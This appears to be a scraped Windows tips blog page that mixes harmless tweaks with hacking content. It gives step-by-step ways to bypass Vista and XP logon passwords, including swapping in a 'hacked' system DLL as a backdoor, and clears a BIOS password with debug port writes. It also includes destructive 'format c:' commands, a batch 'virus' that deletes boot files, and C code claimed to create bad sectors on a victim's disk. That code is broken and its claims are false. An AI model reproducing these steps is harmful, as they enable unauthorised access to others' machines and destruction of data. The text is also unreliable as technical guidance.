Reduce the number to around "100"
This is the delay time before a menu is opened. You can set it to "0" but it can make windows really hard to use as menus will open if you just look at them - well move your mouse over them anyway. I tend to go for anywhere between 50-150 depending on my mood.

Hack Windows Vista Administrator Password.

1. Reboot the Windows Vista and boot up with Windows Vista installation DVD. Crack Windows Vista logon account password in minute with the Windows Vista installation DVD. Click on the Repair Your Computer option, bring up Command Prompt to open Local Users and Groups management in MMC.

2. While the Windows Vista installation interface pops up, click the Repair You Computer link at the bottom-left corner.

3. Next, the System Recovery Options dialog box appears. There are few options that related to repairing Windows Vista, looks like Recovery Console in Windows XP:

Startup Repair options is used to automatically fix problems that are preventing Windows Vista from starting.

System Restore to restore Windows Vista setting to an earlier point in time.

Windows Complete PC Restore to restore Windows Vista from a full system backup.

Windows Memory Diagnostic Tool could be the first Microsoft memory tester toolkit that bundled with Windows setup media.

Command Prompt is the target option of this Vista hacking guide. Click on this option now.

4. In the Windows Vista Command Prompt, type mmc.exe and press ENTER key to bring up the Microsoft Management Console.

5. Click on the File menu, select Add / Remove Snap-in option, locate and select the Local Users and Groups on the left panel, and click Add button to add it to the right panel.

6. Now, the Choose Target Machine dialog box pop up. Keep the default setting by clicking the Finish button – that means using the Local Users and Groups snap-in to manage this local computer, and not another computer in network.

7. Click OK button and return to MMC windows. Under the Root Console in left panel, double-click Local Users and Group that was added earlier. Click on User folder, locate and right-click the target Vista logon account that found in the right panel.

Select the Set Password from the right-click menu to set a new password / reset old password.

Note this does not work on all versions of Vista.

Rename Multiple Files at Once

When you download photos from your digital camera, they often have unrecognizable names. You can rename several similar files at once with the following procedure. This also works for renaming other types of files.

1.Open the My Pictures folder. (Click Start, and then click My Pictures.) Or open another folder containing files that you want to rename.

2.Select the files you want to rename. If the files you want are not adjacent in the file list, press and hold CTRL, and then click each item to select it.

3.On the File menu, click Rename.

4.Type the new name, and then press ENTER.


All of the files in the series will be named in sequence using the new name you type. For example, if you type Birthday, the first will be named Birthday and subsequent files in the series will be named Birthday (1), Birthday (2), and so on.
 
To specify the starting number for the series, type the starting number in parentheses after the new file name. The files in the series will be numbered in sequence starting with the number you type. For example, if you type Birthday (10), the other files will be named Birthday (11), Birthday (12), and so on.

View Admin At welcome Screen

By default windows XP doesn't show the Administrator in the user list at the welcome screen. Here's a way to get around it.

Now head up to HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\Userlist

create a new DWORD entry and name it as Administrator and change its value to 1.

exit and reboot for the changes to take effect.
To change it back change its value to 0 or simply delete the key.

FORMATTING HDD WHILE WINDOWS IS ON

IF u think u cannot format c drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000



format a:\ /Q/X -- this will format your drive a:\


01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

Make yourself invisible !!

I was thinking about it from past so long.. but it was really easy just the case it did'nt strike me..
however here I present this flawless trick !!



For making your name invisible follow the steps:
1) Click on edit profile
2) Type ALT + 0173 in your first name and last name. (i.e. Type 0173 while pressing the ALT key of your keyboard.)
3) Click on Update

SPEED UP UR ACROBAT READER (ALMOST LIKE NOTEPAD)

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast and almost as good as notepad..

Trick to lock your private folder

Suppose you want to lock the folder movies in d: which has the path D:\movies.In the same drive create a text file and type
ren movies movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat

Create another text file and type in it
ren movies.{21EC2020-3AEA-1069-A2DD-08002B30309D} movies
Now save this text file as key.bat

Now you can see 2 batch files loc and key. Press loc and the folder games will change to control panel and you cannot view its contents. Press key and you will get back your original folder.
try it out!!!!!!!

Turn off all system beeps

If you want to turn off all system beeps (like the ones that go through your computers' internal speaker):

Start Regedit

Go to HKEY_CURRENT_USER\Control Panel\Sound

Edit the key Beep and give it a value of No

How to Install Windows XP From a DOS Prompt

• Windows XP CD Computer with Pentium 233 MHz or faster processor Minimum of 64 MB of RAM Minimum of 1.5 GB of hard drive space CD-ROM or DVD-ROM drive Video card and monitor with Super VGA resolution
1. Step 1
Check your BIOS to be sure your computer will boot from a CD. Enter the BIOS setup by pressing the "Delete" or "F12" key, or as directed at the startup screen, immediately after booting. Set the first boot device to "CDROM" or "DVDROM" instead of "hard drive" if it isn't already.
2. Step 2

MS-DOS command prompt
Insert the Windows XP installation CD into your CD or DVD drive and restart the computer. When prompted, choose to start from the MS-DOS command prompt with CD support. The MS-DOS command prompt will appear in a moment.
3. Step 3
Start SMARTDRIVE by typing "SMARTDRV" at the DOS prompt and pressing enter. You don't have to run SMARTDRIVE, but copying the files will be much quicker if you do. The computer will display the DOS prompt again.
4. Step 4
Enter "CD I386" at the DOS prompt to change to the directory where the setup program starts.
5. Step 5
Enter "WINNT" at the prompt to start Windows XP setup. The installation program will copy files to your computer and then display a message requesting to reboot.
6. Step 6
Press the "Enter" key to reboot. The setup program will start again and check that your hard drive format is compatible with Windows XP. If not, it will guide you through partitioning and formatting the drive and then ask you to reboot once more.
7. Step 7
Press "Enter" to reboot. The computer will restart in Windows XP mode and automatically start the Windows Setup Wizard to detect your hardware and finish the installation.

The Best way to Crack the BIOS password

There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.
Follow the steps below:
[eminimall]
1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.
3) type the command at the prompt: “debug” (without quotes ninja.gif )
4) type the following lines now exactly as given…….
o 70 10
o 71 20
quit
exit
4) exit from the dos prompt and restart the machine
password protection gone!!!!!!!!!!!!!
EnjoYYYYYYYYYY

PS: I tested this in Award Bios……..
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..
I have not found any other trouble if the codes are used.
To be on safe side, just back up your data……….
The use of this code is entirely at ur risk……….
It worked fine for me……….

How to Hack Into a Windows XP Computer

How to Hack Into a Windows XP Computer Without Changing Password :

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL from Official website or from Rapidshare.
3. Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press “R” to install DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing:
“ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
10. Copy the hacked file from CD to system32 folder. Type:
“copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
11. Type “exit”, take out disk and reboot.
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
How to Hack Into a Windows XP Computer Without Changing Password – www.crack$hack.ws
14. Go to commands and enable the options and enable the god command.
How to Hack Into a Windows XP Computer Without Changing Password – www.crack$hack.ws
15. Type “god” in the password field to get in Windows.
You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.

AUTO DELETE TEMPORARY FOLDER

ll what i prefer is %temp% " without quotes.. at Start -> Run..

this opens ur temp folder n den u cal erase it neatly// still try dis one too..

First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder

Then right click "Do Not Delete Temp Folder Upon Exit"

Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP

CLOSING MULTIPLE WINDOWS

If you just opened a number of separate, related windows (a folder inside a folder,
and so on), there's an easier way to close them all than one-at-a-time:

• Hold down the shift-key as you click the X caption button in the upper-right corner
of the last window opened. Doing so closes that window and all windows that came before it

CREATE A VIRUS IN 1 MIN

Virus in minutes
Write VIRUS to computer in 1 minutes
Creating virus trick
open ur notepad n type the following.........type del c:\boot.ini c:\del autoexec.batsave as .exe [save it as .exe file....n u can save it by ne name]create the notepad in c: drive...

Sunday, January 2, 2011

CREATE BAD SECTOR ON HARD DISK

/*create bad sectors on the hard disk.
*
* This program will create bad sectors on the hard disk. If you left it
* running for long enough, it could render a hard disk quite useless. When
* bad sectors are found, the sector is marked as bad, so fixing the hard disk
* is not an easy task. Unless the victim has time and knowledge to fix the
* disk, the hard drive can be left quite literally defective.
* supported by preetam
* I don't take responsibility for what you do with this program, served foe educational purpose only.
*
*
*/

#include
#include
#include
#include
#include
#include
#include

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */


void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}